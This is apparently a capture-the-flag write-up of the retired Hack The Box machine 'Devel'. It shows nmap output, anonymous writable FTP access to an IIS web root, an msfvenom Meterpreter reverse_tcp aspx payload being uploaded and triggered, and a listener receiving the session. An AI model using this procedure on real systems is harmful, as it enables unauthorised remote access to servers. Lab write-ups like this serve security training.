HTB – Devel {retired}

We start with an nmap scan of open ports and running services: sudo nmap -sV -sT -O -A -p- <TARGET IP>, where:
-sV enables service/version detection (probing each open port to identify the software and version),
-sT selects a full TCP connect scan,
-O enables operating system fingerprinting,
-A selects an "aggressive" scan (it implies -sV and -O and adds the default NSE scripts and a traceroute),
-p- scans all 65535 TCP ports instead of the default top 1000.

The scan reports two open ports:
21 – ftp,
80 – http.

kali@kali:~$ sudo nmap -sV -sT -O -A -p- 10.10.10.5
[sudo] password for kali: 
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-10 18:36 CEST
Nmap scan report for 10.10.10.5
Host is up (0.039s latency).
Not shown: 65533 filtered ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17  02:06AM       <DIR>          aspnet_client
| 03-17-17  05:37PM                  689 iisstart.htm
| 06-14-20  12:21AM                 2824 met.aspx
|_03-17-17  05:37PM               184946 welcome.png
| ftp-syst: 
|_  SYST: Windows_NT
80/tcp open  http    Microsoft IIS httpd 7.5
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: IIS7

nmap's ftp-anon script already told us that anonymous login is allowed, so we log in to the FTP server as Anonymous to inspect its contents. The listing (aspnet_client, iisstart.htm, welcome.png) is the default IIS 7.5 site, which means the anonymous FTP root is the web root served on port 80. We then check whether anonymous users can also write by uploading a test file, and the upload succeeds: anonymous, writable FTP access to an ASP.NET web root is the whole vulnerability on this box.

kali@kali:~$ ftp 10.10.10.5
Connected to 10.10.10.5.
220 Microsoft FTP Service
Name (10.10.10.5:kali): Anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
03-18-17  02:06AM       <DIR>          aspnet_client
03-17-17  05:37PM                  689 iisstart.htm
03-17-17  05:37PM               184946 welcome.png
226 Transfer complete.
ftp> passive
Passive mode on.
ftp> put /home/kali/Documenti/HTB/Devel/File File
local: /home/kali/Documenti/HTB/Devel/File remote: File
227 Entering Passive Mode (10,10,10,5,192,13).
150 Opening ASCII mode data connection.
226 Transfer complete.
ftp> 

We generate a reverse_tcp payload with msfvenom, using the syntax msfvenom -p <PAYLOAD NAME> LHOST=<KALI IP> LPORT=<PORT> -f <OUTPUT FORMAT> -o <OUTPUT FILE>. Since the web root belongs to an IIS/ASP.NET site (note the aspnet_client directory), we choose the aspx format so that IIS compiles and executes the file server-side when it is requested.

kali@kali:~$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.3 LPORT=4444 -f aspx -o reverse.aspx
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 341 bytes
Final size of aspx file: 2802 bytes
Saved as: reverse.aspx

We upload the payload to the target over FTP (passive mode again, since the active-mode data connection back to our host would otherwise have to get through the filtering seen in the nmap scan).

ftp> passive
Passive mode on.
ftp> put reverse.aspx
local: reverse.aspx remote: reverse.aspx
227 Entering Passive Mode (10,10,10,5,192,16).
150 Opening ASCII mode data connection.
226 Transfer complete.
2857 bytes sent in 0.00 secs (20.7988 MB/s)

In msfconsole we start a listener on port 4444 with exploit/multi/handler, configured for the same payload we generated: use exploit/multi/handler, then set payload <PAYLOAD NAME>, set LHOST to our own address (LPORT defaults to 4444, matching the payload), and run.

msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST                      yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf5 exploit(multi/handler) > set LHOST 10.10.14.3
LHOST => 10.10.14.3
msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.10.14.3:4444 

We trigger the payload by requesting it from the web server in a browser (http://10.10.10.5/reverse.aspx): IIS compiles and runs the page, which connects back to our handler and we get a Meterpreter session. The session runs with the privileges of the IIS worker process that served the page.

msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.10.14.3:4444 
[*] Sending stage (176195 bytes) to 10.10.10.5
[*] Meterpreter session 1 opened (10.10.14.3:4444 -> 10.10.10.5:49173) at 2020-06-11 11:57:59 +0200

meterpreter > 
